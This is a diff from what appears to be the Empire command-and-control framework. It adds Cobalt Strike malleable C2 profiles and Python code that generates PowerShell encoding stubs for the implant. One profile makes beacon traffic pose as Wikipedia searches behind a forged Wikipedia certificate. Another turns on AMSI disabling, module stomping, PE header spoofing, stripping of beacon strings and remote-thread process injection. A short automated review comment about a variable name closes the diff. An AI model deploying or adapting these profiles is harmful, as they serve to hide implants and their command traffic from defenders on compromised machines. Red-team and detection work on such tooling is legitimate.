179 | ||
180 | client { | |
181 | header "Accept" "*/*"; | |
182 | header "Accept-Language" "en-US,en;q=0.5"; | |
183 | header "Accept-Encoding" "gzip, deflate"; | |
184 | header "Connection" "close"; | |
185 | } | |
186 | ||
187 | server { | |
188 | header "Content-Type" "text/html; charset=utf-8"; | |
189 | header "Connection" "close"; | |
190 | header "Server" "Apache"; | |
191 | header "X-XSS-Protection" "0"; | |
192 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
193 | header "Referrer-Policy" "no-referrer"; | |
194 | header "X-Slack-Backend" "h"; | |
195 | header "Pragma" "no-cache"; | |
196 | header "Cache-Control" "private, no-cache, no-store, must-revalidate"; | |
197 | header "X-Frame-Options" "SAMEORIGIN"; | |
198 | header "Vary" "Accept-Encoding"; | |
199 | header "X-Via" "haproxy-www-suhx"; | |
200 | ||
201 | } | |
202 | ||
203 | ||
204 | } | |
205 | ||
206 | ###Malleable PE Options### | |
207 | ||
208 | post-ex { | |
209 | ||
210 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
211 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
212 | ||
213 | set obfuscate "true"; | |
214 | ||
215 | set smartinject "true"; | |
216 | ||
217 | set amsi_disable "true"; | |
218 | ||
219 | } | |
220 | ||
221 | #used peclone on wwanmm.dll. | |
222 | #don't use 'set image_size_xx' if using 'set module_xx' | |
223 | stage { | |
224 | set checksum "0"; | |
225 | set compile_time "25 Oct 2016 01:57:23"; | |
226 | set entry_point "170000"; | |
227 | # set image_size_x86 "6586368"; | |
228 | # set image_size_x64 "6586368"; | |
229 | # set name "WWanMM.dll"; | |
230 | set userwx "false"; | |
231 | set cleanup "true"; | |
232 | set stomppe "true"; | |
233 | set obfuscate "true"; | |
234 | set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
235 | ||
236 | ||
237 | #module stomp | |
238 | ||
239 | #don't use 'set image_size_xx' if using 'set module_xx' | |
240 | set module_x86 "wwanmm.dll"; | |
241 | set module_x64 "wwanmm.dll"; | |
242 | ||
243 | transform-x86 { | |
244 | prepend "\x90\x90\x90"; | |
245 | strrep "ReflectiveLoader" ""; | |
246 | strrep "beacon.dll" ""; | |
247 | } | |
248 | ||
249 | transform-x64 { | |
250 | prepend "\x90\x90\x90"; | |
251 | strrep "ReflectiveLoader" ""; | |
252 | strrep "beacon.x64.dll" ""; | |
253 | } | |
254 | ||
255 | } | |
256 | process-inject { | |
257 | ||
258 | set allocator "NtMapViewOfSection"; | |
259 | ||
260 | set min_alloc "16700"; | |
261 | ||
262 | set userwx "false"; | |
263 | ||
264 | set startrwx "true"; | |
265 | ||
266 | transform-x86 { | |
267 | prepend "\x90\x90\x90"; | |
268 | } | |
269 | transform-x64 { | |
270 | prepend "\x90\x90\x90"; | |
271 | } | |
272 | ||
273 | execute { | |
274 | CreateThread "ntdll!RtlUserThreadStart"; | |
275 | CreateThread; | |
276 | NtQueueApcThread; | |
277 | CreateRemoteThread; | |
278 | RtlCreateUserThread; | |
279 | } | |
280 | } |
0 | # | |
1 | # Wikipedia | |
2 | # | |
3 | # Author: @bluscreenofjeff | |
4 | # | |
5 | ||
6 | #set https cert info | |
7 | https-certificate { | |
8 | set CN "*.wikipedia.org"; #Common Name | |
9 | set C "US"; #Country | |
10 | set L "San Francisco"; #Locality | |
11 | set OU "Wikimedia Foundation Inc"; #Organizational Unit Name | |
12 | set ST "CA"; #State or Province | |
13 | set validity "365"; #Number of days the cert is valid for | |
14 | } | |
15 | ||
16 | #default Beacon sleep duration and jitter | |
17 | set sleeptime "60000"; | |
18 | set jitter "20"; | |
19 | ||
20 | #default useragent for HTTP comms | |
21 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
22 | ||
23 | #IP address used to indicate no tasks are available to DNS Beacon | |
24 | set dns_idle "8.8.4.4"; | |
25 | ||
26 | #Force a sleep prior to each individual DNS request. (in milliseconds) | |
27 | set dns_sleep "0"; | |
28 | ||
29 | #Maximum length of hostname when uploading data over DNS (0-255) | |
30 | set maxdns "235"; | |
31 | ||
32 | http-get { | |
33 | ||
34 | set uri "/w/index.php"; | |
35 | ||
36 | client { | |
37 | ||
38 | header "Host" "en.wikipedia.org"; | |
39 | header "Accept" "text/html,application/xhtml+xml,application/xml;"; | |
40 | header "Referer" "https://en.wikipedia.org/wiki/Main_Page"; | |
41 | ||
42 | #session metadata | |
43 | metadata { | |
44 | base64url; | |
45 | parameter "search"; | |
46 | } | |
47 | parameter "title" "Special%3ASearch"; | |
48 | parameter "go" "Go"; | |
49 | } | |
50 | ||
51 | ||
52 | server { | |
53 | ||
54 | header "Server" "mw1178.eqiad.wmnet"; | |
55 | header "X-Powered-By" "HHVM/3.12.7"; | |
56 | header "X-Content-Type-Options" "nosniff"; | |
57 | header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info."; | |
58 | header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization"; | |
59 | ||
60 | #Beacon's tasks | |
61 | output { | |
62 | netbios; | |
63 | prepend "<!DOCTYPE html><html class=client-nojs lang=en dir=ltr><head><meta charset=UTF-8/><title>Wikipedia</title><script>document.documentElement.className = document.documentElement.className.replace( /(^|s)client-nojs(s|$)/, $1client-js$2 );</script><script>(window.RLQ=window.RLQ||[]).push(function(){mw.config.set({wgCanonicalNamespace:,wgCanonicalSpecialPageName:false,wgNamespaceNumber:0,,wgBetaFeaturesFeatures:[],wgMediaViewerOnClick:true,wgMediaViewerEnabledByDefault:true,wgVisualEditor:{pageLanguageCode:en,pageLanguageDir:ltr,usePageImages:true,usePageDescriptions:true},wgPreferredVariant:en,wgMFDisplayWikibaseDescriptions:{search:true,nearby:true,watchlist:true,tagline:false},wgRelatedArticles:null,wgRelatedArticlesUseCirrusSearch:true,wgRelatedArticlesOnlyUseCirrusSearch:false,wgULSCurrentAutonym:English,wgNoticeProject:wikipedia,wgCentralNoticeCookiesToDelete:[],wgCentralNoticeCategoriesUsingLegacy:[Fundraising,fundraising],wgCategoryTreePageCategoryOptions:{mode:0,hideprefix:20,showcount:true,namespaces:false},wgWikibaseItemId:"; | |
64 | ||
65 | append ",wgCentralAuthMobileDomain:false,wgVisualEditorToolbarScrollOffset:0,wgEditSubmitButtonLabelPublish:false});mw.loader.state({ext.globalCssJs.user.styles:ready,ext.globalCssJs.site.styles:ready,site.styles:ready,noscript:ready,user.styles:ready,user:ready,user.options:loading,user.tokens:loading,wikibase.client.init:ready,ext.visualEditor.desktopArticleTarget.noscript:ready,ext.uls.interlanguage:ready,ext.wikimediaBadges:ready,mediawiki.legacy.shared:ready,mediawiki.legacy.commonPrint:ready,mediawiki.sectionAnchor:ready,mediawiki.skinning.interface:ready,skins.vector.styles:ready,ext.globalCssJs.user:ready,ext.globalCssJs.site:ready});mw.loader.implement(user.options@0j3lz3q,function($,jQuery,require,module){mw.user.options.set({variant:en});});mw.loader.implement(user.tokens@1dqfd7l,function ( $, jQuery, require, module )</script><link rel=stylesheet href=/w/load.php?debug=false&lang=en&modules=ext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cmediawiki.legacy.commonPrint%2Cshared%7Cmediawiki.sectionAnchor%7Cmediawiki.skinning.interface%7Cskins.vector.styles%7Cwikibase.client.init&only=styles&skin=vector/><script async= src=/w/load.php?debug=false&lang=en&modules=startup&only=scripts&skin=vector></script><meta name=ResourceLoaderDynamicStyles content=/><link rel=stylesheet href=/w/load.php?debug=false&lang=en&modules=site.styles&only=styles&skin=vector/>"; | |
66 | ||
67 | print; | |
68 | } | |
69 | } | |
70 | } | |
71 | ||
72 | http-post { | |
73 | ||
74 | set uri "/wiki"; | |
75 | set verb "GET"; | |
76 | ||
77 | client { | |
78 | ||
79 | header "Host" "en.wikipedia.org"; | |
80 | header "Accept" "text/html,application/xhtml+xml,application/xml;"; | |
81 | ||
82 | #session ID | |
83 | id { | |
84 | base64url; | |
85 | prepend "/"; | |
86 | uri-append; | |
87 | } | |
88 | ||
89 | ||
90 | #Beacon's responses | |
91 | output { | |
92 | base64url; | |
93 | prepend "https://en.wikipedia.org/w/index.php?search="; | |
94 | append "&title=Special%3ASearch&go=Go"; | |
95 | header "Referer"; | |
96 | } | |
97 | } | |
98 | ||
99 | server { | |
100 | ||
101 | header "Server" "mw1178.eqiad.wmnet"; | |
102 | header "X-Powered-By" "HHVM/3.12.7"; | |
103 | header "X-Content-Type-Options" "nosniff"; | |
104 | header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info."; | |
105 | header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization"; | |
106 | ||
107 | #empty | |
108 | output { | |
109 | ||
110 | prepend "<body class=mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Test rootpage-Test skin-vector action-view><div id=mw-page-base class=noprint></div><div id=mw-head-base class=noprint></div><div id=content class=mw-body role=main><a id=top></a><div id=siteNotice><!-- CentralNotice --></div><div class=mw-indicators><div id=mw-indicator-pp-default class=mw-indicator><a href=/wiki/Wikipedia:Protection_policy#semi title=This article is semi-protected due to vandalism><img alt=Page semi-protected src=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/20px-Padlock-silver.svg.png width=20 height=20 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/30px-Padlock-silver.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/40px-Padlock-silver.svg.png 2x data-file-width=128 data-file-height=128 /></a></div></div><h1 id=firstHeading class=firstHeading lang=en>Wikipedia</h1><div id=bodyContent class=mw-body-content><div id=siteSub>From Wikipedia, the free encyclopedia</div><div id=contentSub><span class=mw-redirectedfrom>ᅡᅠᅡᅠ(Redirected from <a href=/w/index.php?title=Testing&redirect=no class=mw-redirect title=Testing>Testing</a>)</span></div><div id=jump-to-nav class=mw-jump>Jump to:<a href=#mw-head>navigation</a>,<a href=#p-search>search</a></div><div id=mw-content-text lang=en dir=ltr class=mw-content-ltr><script>function mfTempOpenSection(id){var block=document.getElementById(mf-section-+id);block.className+= open-block;block.previousSibling.className+= open-block;}</script><table class=plainlinks metadata ambox ambox-content role=presentation><tr><td class=mbox-image><div style=width:52px><img alt= src=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/50px-Sandbox_Not.svg.png width=50 height=50 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/75px-Sandbox_Not.svg.png 1.5x, 
//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/100px-Sandbox_Not.svg.png 2x data-file-width=766 data-file-height=766 /></div></td>"; | |
111 | ||
112 | print; | |
113 | } | |
114 | } | |
115 | } | |
116 | ||
117 | #change the stager server | |
118 | http-stager { | |
119 | server { | |
120 | header "Content-Type" "text/html"; | |
121 | } | |
122 | } |
14 | 14 | - [threatexpress](https://github.com/threatexpress/malleable-c2) |
15 | 15 | - [yeyintminthuhtut](https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection) |
16 | 16 | - [bluscreenofjeff](https://github.com/bluscreenofjeff/MalleableC2Profiles) |
17 | - [skgray](https://github.com//Malleable-C2) | |
18 | 17 | - [mhaskar](https://github.com/mhaskar/MalleableC2-Profiles) |
19 | 18 | |
20 | 19 | ## Documentation |
21 | 20 | - [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) |
22 | - [Malleable C2 Documenation](https://www.cobaltstrike.com/help-malleable-c2) | |
21 | - [Malleable C2 Documentation](https://www.cobaltstrike.com/help-malleable-c2) | |
22 | - [Empire: Malleable C2 Profiles](https://www.bc-security.org/post/empire-malleable-c2-profiles/) |
18 | 18 | from datetime import datetime, timezone |
19 | 19 | from flask_socketio import SocketIO |
20 | 20 | |
21 | VERSION = "3.7.1 BC Security Fork" | |
21 | VERSION = "3.7.2 BC Security Fork" | |
22 | 22 | |
23 | 23 | from pydispatch import dispatcher |
24 | 24 |
271 | 271 | netbios algorithm.""" |
272 | 272 | self.transform = lambda data: netbios_transform(data) |
273 | 273 | self.transform_r = lambda data: netbios_transform_r(data) |
274 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var} | |
275 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
276 | self.generate_powershell = lambda var: netbios_powershell(var) | |
277 | self.generate_powershell_r = lambda var: netbios_powershell_r(var) | |
274 | 278 | |
275 | 279 | def netbios_transform(data): |
276 | 280 | if isinstance(data, str): |
284 | 288 | r = "".join([chr(((data[i]-0x61)<<4)|((data[i+1]-0x61)&0xF)) for i in range(0, len(data), 2)]) |
285 | 289 | return r.encode('latin-1') |
286 | 290 | |
287 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var} | |
288 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
289 | self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+97;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+97;}));" % {"var":var} | |
290 | self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-97) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-97) -band 15);}));" % {"var":var} | |
291 | def netbios_powershell(var): | |
292 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+97;($data2[$i] -band 15)+97;}));" % {"var": var} | |
293 | ||
294 | def netbios_powershell_r(var): | |
295 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-97 -shl 4) -bor ($data2[$i+1]-97 -band 15);}));" % {"var":var} | |
291 | 296 | |
292 | 297 | def _netbiosu(self): |
293 | 298 | """Configure the `netbiosu` Transform, which encodes an arbitrary input using the upper-case |
294 | 299 | netbios algorithm.""" |
295 | self.transform = lambda data: netbios_transform(data) | |
296 | self.transform_r = lambda data: netbios_transform_r(data) | |
297 | ||
298 | def netbios_transform(data): | |
300 | self.transform = lambda data: netbiosu_transform(data) | |
301 | self.transform_r = lambda data: netbiosu_transform_r(data) | |
302 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var} | |
303 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
304 | self.generate_powershell = lambda var: netbiosu_powershell(var) | |
305 | self.generate_powershell_r = lambda var: netbiosu_powershell_r(var) | |
306 | ||
307 | def netbiosu_transform(data): | |
299 | 308 | if isinstance(data, str): |
300 | 309 | data = data.encode('latin-1') |
301 | 310 | r = "".join([chr((c>>4)+0x41)+chr((c&0xF)+0x41) for c in data]) |
302 | 311 | return r.encode('latin-1') |
303 | 312 | |
304 | def netbios_transform_r(data): | |
313 | def netbiosu_transform_r(data): | |
305 | 314 | if isinstance(data, str): |
306 | 315 | data = data.encode('latin-1') |
307 | 316 | r = "".join([chr(((data[i]-0x41)<<4)|((data[i+1]-0x41)&0xF)) for i in range(0, len(data), 2)]) |
308 | 317 | return r.encode('latin-1') |
309 | 318 | |
310 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var} | |
311 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
312 | self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+65;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+65;}));" % {"var":var} | |
313 | self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-65) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-65) -band 15);}));" % {"var":var} | |
319 | def netbiosu_powershell(var): | |
320 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+65;($data2[$i] -band 15)+65;}));" % {"var":var} | |
321 | ||
322 | def netbiosu_powershell_r(var): | |
323 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-65 -shl 4) -bor ($data2[$i+1]-65 -band 15);}));" % {"var":var} | |
314 | 324 | |
315 | 325 | def _prepend(self, string): |
316 | 326 | """Configure the `prepend` Transform, which prepends a static string to an arbitrary input. |
485 | 485 | |
486 | 486 | if redirectListenerOptions: |
487 | 487 | |
488 | self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value'] | |
489 | self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value'] | |
490 | redirectHost = redirectListenerOptions['Host']['Value'] | |
488 | self.options['RedirectStagingKey']['Value'] = redirectListenerOptions.options['StagingKey']['Value'] | |
489 | self.options['DefaultProfile']['Value'] = redirectListenerOptions.options['DefaultProfile']['Value'] | |
490 | redirectHost = redirectListenerOptions.options['Host']['Value'] | |
491 | 491 | |
492 | 492 | uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] |
493 | 493 |
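Review bot: `redirectListenerOptions` now holds an object whose `.options` dictionary is read at lines 488–490, so the name no longer describes the value and invites the next reader to index it directly again, which is presumably the error this change fixes. If the name is fixed by the enclosing function's signature (the function begins outside this hunk), a comment at line 488 such as `# redirectListenerOptions is the redirect listener object; its settings live in .options` would make the shape explicit; otherwise renaming it to `redirectListener` would be clearer. The `if redirectListenerOptions:` guard at line 486 only checks that the object is truthy; whether `.options` always carries `StagingKey`, `DefaultProfile` and `Host` cannot be confirmed from this hunk, and a missing key there would surface as the same kind of load failure.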
886 | 886 | getTask += "$data = [System.Text.Encoding]::Default.GetString($data);" |
887 | 887 | |
888 | 888 | # ==== INTERPRET RESULTS ==== |
889 | getTask += profile.get.server.output.generate_powershell_r("$data"); | |
889 | getTask += profile.get.server.output.generate_powershell_r("$data") | |
890 | 890 | getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);" |
891 | 891 | |
892 | 892 | # ==== RETURN RESULTS ==== |